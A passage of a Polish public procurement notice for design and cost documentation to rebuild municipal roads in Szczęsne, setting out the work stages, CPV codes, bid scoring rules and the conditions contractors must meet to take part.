projektu koncepcyjnego przebudowy drogi wraz z opisem rozwiązań technicznych – 2 kpl.<br/><br/>ETAP 2 – zakres prac:<br/>• Opracowanie kompletnego projektu budowlanego (projektu zagospodarowania działki lub terenu, projektu architektoniczno-budowlanego), projektu technicznego, wykonawczego oraz opinii, uzgodnień, pozwoleń i innych dokumentów o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. 2023 r., poz. 682 ze zm.) wraz z niezbędnymi branżami z uwzględnieniem przebudowy istniejących urządzeń odwadniających jeśli jest wymagana oraz z uwzględnieniem, w przypadku wystąpienia kolizji, wykonania ewentualnych przełożeń/rur ochronnych/wykonania nowych odcinków istniejącej infrastruktury zgodnie z warunkami wydanymi przez Właściciela lub zarządcę sieci kolidującej – 5 kpl., <br/>• Opracowanie wszelkich niezbędnych dokumentów wymaganych w celu uzyskania stosownych decyzji, uzgodnień i pozwoleń umożliwiających prowadzenie robót budowlanych,<br/>• W razie konieczności również inne ekspertyzy, opracowania, raporty, operaty, opracowania dendrologiczne oraz inne dokumentacje i decyzje administracyjne niezbędne dla zaprojektowania, wybudowania, w tym zgłoszenie/pozwolenia na budowę/ZRiD uruchomienia np. pozwolenie na zajęcie pasa drogowego, pozwolenie na objazdy, na prowadzenie drogi, na rozpoczęcie prac i na zakrycie robót zanikających przy przebudowie obiektów istniejących,<br/>• Opracowanie projektu organizacji ruchu wraz z niezbędnymi opiniami – 5 kpl.,<br/>• Kosztorys inwestorski wraz z przedmiarem robót (dla każdej branży osobno) – 2 kpl.,<br/>Kosztorys zapisany w pdf. oraz w wersji edytowalnej do programu kosztorysowego posiadanego przez Zamawiającego. Kosztorys inwestorski opracowany zgodnie z Rozporządzeniem Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno – użytkowym,<br/>•Specyfikacji technicznych wykonania i odbioru robot budowlanych (STWiORB) – 2 kpl.,<br/>Dokumentacja projektowa powinny spełniać w szczególności wymogi określone w wymaganiach ustawy Prawo budowlane (Dz. U. z 2023 r., poz. 682), Rozporządzeniem Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. 2021 r., poz. 2454) i w zakresie wynikającym z Rozporządzenia Ministra Rozwoju z dnia 11 września 2020 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2022 r., poz. 1679). <br/>Wykonawca dostarczy dokumentację w formie papierowej i elektronicznej zapisanej: - część tekstowa w pdf. i edytowalnej oraz część rysunkową w pdf i dwg. Dokumentacja w wersji elektronicznej powinna być spójna z dokumentacją w wersji papierowej tj. zachowana kolejność stron oraz wszystkie załączniki, opnie, sprawdzenia, uzgodnienia, które wchodzą w jej skład. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</p> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <p class="mb-0">71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71200000-0 - Usługi architektoniczne i podobne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie kierował się następującym kryterium i jego znaczeniem:<br/>1. Kryterium wyboru najkorzystniejszej oferty jest najniższa cena brutto wyrażona w PLN.<br/>Cena* – Wc (waga 60), proporcjonalnie wg wzoru:<br/><br/>Wartość całkowita kryterium Cena<br/><br/> najniższa cena brutto z ofert<br/>Wc = ––––––––––––––––––––––––––––––––––––––– x 60<br/> cena brutto oferty badanej<br/><br/>* w przypadku podmiotów zagranicznych, które na podstawie odrębnych przepisów, nie są zobowiązane do<br/>uiszczenia podatku VAT w kraju i ich oferty zawierają cenę z 0% stawką podatku VAT, Zamawiający dokonując oceny ofert w kryterium ceny dla porównania tych ofert doliczy do ceny ofertowej podmiotów zagranicznych, kwotę należnego, obciążającego Zamawiającego z tytułu realizacji umowy, podatku VAT oraz cła.<br/><br/>2. Doświadczenia osoby wyznaczonej do realizacji zamówienia (Wd) – (waga 40)<br/><br/>Doświadczenie projektanta z branży drogowej 3 lata – 0 punktów<br/>Doświadczenie projektanta z branży drogowej 4-5 lat – 20 punktów<br/>Doświadczenie projektanta z branży drogowej 6 lat i więcej – 40 punktów<br/><br/>Oferty w tym kryterium oceniane będą w odniesieniu do doświadczenia projektanta przedstawionego przez Wykonawców zastrzegając, iż minimalne doświadczenie projektanta to 3 lata. W sytuacji, gdy Wykonawca nie wskaże w ofercie doświadczenia projektanta lub wskaże doświadczenie mniejsze niż 3 lata, oferta taka zostanie odrzucona jako niezgodna z warunkami zamówienia. W przypadku gdy Wykonawca wykaże doświadczenie projektanta 4-5 lat, oferta taka otrzyma 20 pkt. W przypadku gdy Wykonawca wykaże w formularzu ofertowym doświadczenie projektanta 6 lat lub większe, oferta taka otrzyma 40 pkt. Informacje dotyczące doświadczenia projektanta Wykonawca poda w Formularzu Oferta – Załączniku nr 2 do SWZ. Maksymalna liczba punktów możliwych do uzyskania w tym kryterium to 40 pkt.<br/><br/>3. Całkowita punktowa wartość oferty liczona będzie wg wzoru: W = Wc + Wd.<br/>1) W oparciu o powyższe kryteria opisane wzorem zostanie sporządzone zbiorcze zestawienie oceny ofert. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejsza ofertę.<br/>2) Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z niższą ceną.<br/>3) Jeżeli zostanie złożona oferta, której wybór prowadzić będzie do powstania obowiązku podatkowego Zamawiającego zgodnie z przepisami o podatku od towarów i usług w zakresie dotyczącym wewnątrz wspólnotowego nabycia towarów, Zamawiający w celu oceny takiej oferty doliczy do przedstawionej w niej ceny podatek od towarów i usług, który będzie miał obowiązek wpłacić zgodnie z obowiązującymi przepisami.<br/>4) W przypadku złożenia oferty przez Wykonawcę mającego swoją siedzibę w kraju spoza obszaru Unii<br/>Europejskiej, Zamawiający w celu oceny takiej oferty doliczy do przedstawionej w niej ceny różnicę w kwocie należnego podatku VAT oraz pozostałych należności, których obowiązek uiszczenia spoczywa na Zamawiającym, wynikających z innych przepisów, w tym celnych.<br/>5) Zamawiający zastosuje zaokrąglenie do dwóch miejsc po przecinku.<br/>6) Komisja wybiera ofertę najkorzystniejszą, przez co należy rozumieć ofertę, która otrzyma największą liczbę punktów.<br/>4. Sposób oceny ofert.<br/>Przy ocenie ofert i wyborze oferty najkorzystniejszej komisja przetargowa będzie postępować zgodnie z wymaganiami ustawy oraz kierować się przesłanką określoną w kryterium oceny ofert.<br/><br/>Ze względu na ograniczoną ilość znaków, pełny opis dot. sposobu oceny ofert zawarty jest w Rozdziale XXII SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta z branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie dokumentacji projektowo-kosztorysowej przebudowy dróg gminnych w m. Szczęsne:<br/><br/>Część III- Dokumentacja projektowo-kosztorysowa przebudowy ul. Lawendowej.<br/><br/>Droga objęta zakresem opracowania o długości 250 m szer. 5 m. Początek drogi gminnej przyjęto od skrzyżowania z ul. Akacjową przez dz. 166/12 do końca działki 267/60 (granica styku z działką nr 267/48 i dz. 267/61, 267/62,). Zakres objęty dokumentacją techniczną przedstawia załącznik graficzny – Załącznik nr 5 do SWZ.<br/>Projektowana droga o nawierzchni jezdni z kostki betonowej wraz z obustronnymi poboczami, dojściami do furtek, wjazdami na nieruchomości oraz zjazdami na drogi wewnętrzne. Kategoria ruchu KR2, zakładana prędkość na terenie zabudowy 40 km/h.<br/>Zaprojektować należy odwodnienie drogi poprzez wpusty do zaprojektowanej kanalizacji deszczowej w ul. Wrzosowej (Załącznik nr 5 do SWZ).<br/>W liniach rozgraniczających występują: podziemna linia energetyczna, doziemna linia telekomunikacyjna, sieć wodociągowa, kanalizacja sanitarna.<br/>Zaprojektować przebudowę kolizji z istniejącą infrastrukturą techniczną zgodnie z warunkami wydanymi przez dysponentów sieci.<br/>Należy również sporządzić projekt stałej organizacji ruchu – uwzględniając przede wszystkim skrzyżowania z drogami wewnętrznymi. Zaprojektować należy ustawienie znaków pionowych z grupy wielkości „małe” z tarczami pokrytymi folią odblaskową typu II. <br/>Obszar przyjęty do opracowaniem nie jest objęty miejscowego planu zagospodarowania przestrzennego.<br/><br/>ETAP 1 – zakres prac:<br/>Mapa do celów projektowych – 2 kpl.,<br/>Przygotowanie mapy sytuacyjno-wysokościowej do celów projektowych. Mapa do celów projektowych w swojej treści musi zawierać ustalone granice działek ewidencyjnych z dokładnością właściwą dla szczegółów terenowych I grupy, usytuowanie drzew i krzewów, pozostałych urządzeń i budowli oraz bezwzględnie całą podziemną infrastrukturę techniczną. <br/>Opinia Geotechniczna – 2 kpl.,<br/>Opracowanie projektu koncepcyjnego przebudowy drogi wraz z opisem rozwiązań technicznych – 2 kpl.<br/><br/>ETAP 2 – zakres prac:<br/>• Opracowanie kompletnego projektu budowlanego (projektu zagospodarowania działki lub terenu, projektu architektoniczno-budowlanego), projektu technicznego, wykonawczego oraz opinii, uzgodnień, pozwoleń i innych dokumentów o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. 2023 r., poz. 682 ze zm.) wraz z niezbędnymi branżami z uwzględnieniem przebudowy istniejących urządzeń odwadniających jeśli jest wymagana oraz z uwzględnieniem, w przypadku wystąpienia kolizji, wykonania ewentualnych przełożeń/rur ochronnych/wykonania nowych odcinków istniejącej infrastruktury zgodnie z warunkami wydanymi przez Właściciela lub zarządcę sieci kolidującej – 5 kpl., <br/>• Opracowanie wszelkich niezbędnych dokumentów wymaganych w celu uzyskania stosownych decyzji, uzgodnień i pozwoleń umożliwiających prowadzenie robót budowlanych,<br/>• W razie konieczności również inne ekspertyzy, opracowania, raporty, operaty, opracowania dendrologiczne oraz inne dokumentacje i decyzje administracyjne niezbędne dla zaprojektowania, wybudowania, w tym zgłoszenie/pozwolenia na budowę/ZRiD uruchomienia np. pozwolenie na zajęcie pasa drogowego, pozwolenie na objazdy, na prowadzenie drogi, na rozpoczęcie prac i na zakrycie robót zanikających przy przebudowie obiektów istniejących,<br/>• Opracowanie projektu organizacji ruchu wraz z niezbędnymi opiniami – 5 kpl.,<br/>• Kosztorys inwestorski wraz z przedmiarem robót ( dla każdej branży osobno) – 2 kpl.,<br/>Kosztorys zapisany w pdf. oraz w wersji edytowalnej do programu kosztorysowego posiadanego przez Zamawiającego. Kosztorys inwestorski opracowany zgodnie z Rozporządzeniem Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno – użytkowym,<br/>• Specyfikacji technicznych wykonania i odbioru robot budowlanych (STWiORB) – 2 kpl.,<br/>Dokumentacja projektowa powinny spełniać w szczególności wymogi określone w wymaganiach ustawy Prawo budowlane (Dz. U. z 2023 r. poz. 682.), Rozporządzeniem Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. 2021 r., poz. 2454) i w zakresie wynikającym z Rozporządzenia Ministra Rozwoju z dnia 11 września 2020 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2022 r., poz. 1679). <br/>Wykonawca dostarczy dokumentację w formie papierowej i elektronicznej zapisanej: - część tekstowa w pdf. i edytowalnej oraz część rysunkową w pdf i dwg. Dokumentacja w wersji elektronicznej powinna być spójna z dokumentacją w wersji papierowej tj. zachowana kolejność stron oraz wszystkie załączniki, opnie, sprawdzenia, uzgodnienia, które wchodzą w jej skład. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</p> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <p class="mb-0">71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71200000-0 - Usługi architektoniczne i podobne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie kierował się następującym kryterium i jego znaczeniem:<br/>1. Kryterium wyboru najkorzystniejszej oferty jest najniższa cena brutto wyrażona w PLN.<br/>Cena* – Wc (waga 60), proporcjonalnie wg wzoru:<br/><br/>Wartość całkowita kryterium Cena<br/><br/> najniższa cena brutto z ofert<br/>Wc = ––––––––––––––––––––––––––––––––––––––– x 60<br/> cena brutto oferty badanej<br/><br/>* w przypadku podmiotów zagranicznych, które na podstawie odrębnych przepisów, nie są zobowiązane do<br/>uiszczenia podatku VAT w kraju i ich oferty zawierają cenę z 0% stawką podatku VAT, Zamawiający dokonując oceny ofert w kryterium ceny dla porównania tych ofert doliczy do ceny ofertowej podmiotów zagranicznych, kwotę należnego, obciążającego Zamawiającego z tytułu realizacji umowy, podatku VAT oraz cła.<br/><br/>2. Doświadczenia osoby wyznaczonej do realizacji zamówienia (Wd) – (waga 40)<br/><br/>Doświadczenie projektanta z branży drogowej 3 lata – 0 punktów<br/>Doświadczenie projektanta z branży drogowej 4-5 lat – 20 punktów<br/>Doświadczenie projektanta z branży drogowej 6 lat i więcej – 40 punktów<br/><br/>Oferty w tym kryterium oceniane będą w odniesieniu do doświadczenia projektanta przedstawionego przez Wykonawców zastrzegając, iż minimalne doświadczenie projektanta to 3 lata. W sytuacji, gdy Wykonawca nie wskaże w ofercie doświadczenia projektanta lub wskaże doświadczenie mniejsze niż 3 lata, oferta taka zostanie odrzucona jako niezgodna z warunkami zamówienia. W przypadku gdy Wykonawca wykaże doświadczenie projektanta 4-5 lat, oferta taka otrzyma 20 pkt. W przypadku gdy Wykonawca wykaże w formularzu ofertowym doświadczenie projektanta 6 lat lub większe, oferta taka otrzyma 40 pkt. Informacje dotyczące doświadczenia projektanta Wykonawca poda w Formularzu Oferta – Załączniku nr 2 do SWZ. Maksymalna liczba punktów możliwych do uzyskania w tym kryterium to 40 pkt.<br/><br/>3. Całkowita punktowa wartość oferty liczona będzie wg wzoru: W = Wc + Wd.<br/>1) W oparciu o powyższe kryteria opisane wzorem zostanie sporządzone zbiorcze zestawienie oceny ofert. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejsza ofertę.<br/>2) Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z niższą ceną.<br/>3) Jeżeli zostanie złożona oferta, której wybór prowadzić będzie do powstania obowiązku podatkowego Zamawiającego zgodnie z przepisami o podatku od towarów i usług w zakresie dotyczącym wewnątrz wspólnotowego nabycia towarów, Zamawiający w celu oceny takiej oferty doliczy do przedstawionej w niej ceny podatek od towarów i usług, który będzie miał obowiązek wpłacić zgodnie z obowiązującymi przepisami.<br/>4) W przypadku złożenia oferty przez Wykonawcę mającego swoją siedzibę w kraju spoza obszaru Unii<br/>Europejskiej, Zamawiający w celu oceny takiej oferty doliczy do przedstawionej w niej ceny różnicę w kwocie należnego podatku VAT oraz pozostałych należności, których obowiązek uiszczenia spoczywa na Zamawiającym, wynikających z innych przepisów, w tym celnych.<br/>5) Zamawiający zastosuje zaokrąglenie do dwóch miejsc po przecinku.<br/>6) Komisja wybiera ofertę najkorzystniejszą, przez co należy rozumieć ofertę, która otrzyma największą liczbę punktów.<br/>4. Sposób oceny ofert.<br/>Przy ocenie ofert i wyborze oferty najkorzystniejszej komisja przetargowa będzie postępować zgodnie z wymaganiami ustawy oraz kierować się przesłanką określoną w kryterium oceny ofert.<br/><br/>Ze względu na ograniczoną ilość znaków, pełny opis dot. sposobu oceny ofert zawarty jest w Rozdziale XXII SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta z branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1. Nie podlegają wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego. Zamawiający nie przewiduje wykluczenia Wykonawcy na podstawie art. 109 ust. 1 ustawy Pzp.<br/>2. Spełniają warunki udziału w postępowaniu określone w art. 112 ust. 2 ustawy Pzp dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym (art. 112 ust. 2 pkt 1 ustawy Pzp):<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełnienia tego warunku.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów (art. 112 ust. 2 pkt 2 ustawy Pzp):<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełnienia tego warunku.<br/>3) sytuacji ekonomicznej lub finansowej (art. 112 ust. 2 pkt 3 ustawy Pzp):<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełnienia tego warunku.<br/>4) zdolności technicznej lub zawodowej (art. 112 ust. 2 pkt 4 ustawy Pzp):<br/>W celu potwierdzenia minimalnych zdolności technicznych i zawodowych, Wykonawcy winni udokumentować:<br/>2.4.1. <br/>Zamawiający uzna w/w warunek za spełniony, jeżeli:<br/>Wykonawca wykaże dysponowanie osobami, które będą uczestniczyć w wykonaniu zamówienia, legitymującymi się kwalifikacjami zawodowymi i doświadczeniem odpowiednim do funkcji, jaka zostanie im powierzona:<br/><br/>Branża drogowa - 1 os. - Posiadane kwalifikacje to uprawnienia budowlane do projektowania w specjalności inżynieryjnej drogowej* - Wymagane doświadczenie: 1. Minimum 3 lat doświadczenia zawodowego jako projektant. 2. Autor/współautor min. jednego opracowania projektowego dotyczącego budowy lub/i przebudowy lub/i rozbudowy drogi publicznej.<br/><br/>* lub równoważne jeśli zostały wydane według przepisów prawa obowiązujących w momencie wydawania uprawnień<br/><br/>3. Udostępnianie zasobów.<br/>3.1. Na podstawie art. 118 ustawy Pzp:<br/>3.1.1. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu lub kryteriów selekcji, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>3.1.2. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>3.1.3. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>3.1.4. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w pkt. 3.1.3, potwierdza, że stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>1) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.<br/>3.2. Zamawiający ocenia, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu, o których mowa w art. 112 ust. 2 pkt 3 i 4 ustawy, a także bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane względem Wykonawcy.<br/>3.3. Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z Wykonawcą, który polega na jego sytuacji finansowej lub ekonomicznej, za szkodę poniesioną przez Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi winy.<br/>3.4. Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa podmiotu udostępniającego zasoby nie potwierdzają spełniania przez Wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, Zamawiający żąda, aby Wykonawca w terminie określonym przez Zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu.<br/>3.5. Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby.<br/>4. Wykonawcy wspólnie ubiegający się o zamówienie:<br/>4.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>4.2. W przypadku, o którym mowa w pkt. 4.1, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>4.3. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców, o których mowa w pkt. 4.1.<br/>4.4. Jeżeli oferta Wykonawców, o których mowa w pkt. 4.1, została wybrana, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>4.5. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w pkt. 2.2, jest spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane.<br/>4.6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>4.7. W przypadku, o którym mowa w pkt. 4.5 i 4.6, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy.<br/>5. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w oparciu o oświadczenia oraz<br/>dokumenty wymienione w Rozdziale XIX SWZ według formuły spełnia/nie spełnia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż wymienione w pkt 1 i 2 warunki udziału w postępowaniu Wykonawca spełnił.<br/>6. Oceniając zdolność techniczną lub zawodową, Zamawiający może, na każdym etapie postępowania, uznać,<br/>że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>7. Zamawiający odrzuci na podstawie art. 226 ust. 1 pkt. 2 lit. a), b) ustawy oferty Wykonawców, którzy odpowiednio nie wykażą, że nie podlegają wykluczeniu z postępowania lub nie wykażą spełniania warunków udziału w postępowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W celu wstępnego potwierdzenia, że Wykonawca nie podlega wykluczeniu, Wykonawca składa wraz z ofertą:<br/>- oświadczenia o braku podstaw do wykluczenia na podstawie art. 108 ust. 1 ustawy Pzp (Załącznik nr 3/3a do SWZ).<br/>- oświadczenie składane na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Załącznik nr 9/9a do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W celu wstępnego potwierdzenia, że Wykonawca spełnia warunki udziału w postępowaniu, Wykonawca składa wraz z ofertą:<br/><br/>- oświadczenie o spełnianiu warunków udziału w postępowaniu, określonych w art. art. 112 ust. 2 ustawy (Załącznik nr 3/3a do SWZ).<br/><br/>2. W celu potwierdzenia spełniania przez Wykonawcę warunków, o których mowa w art. 57 ustawy, Wykonawca składa na wezwanie Zamawiającego następujące 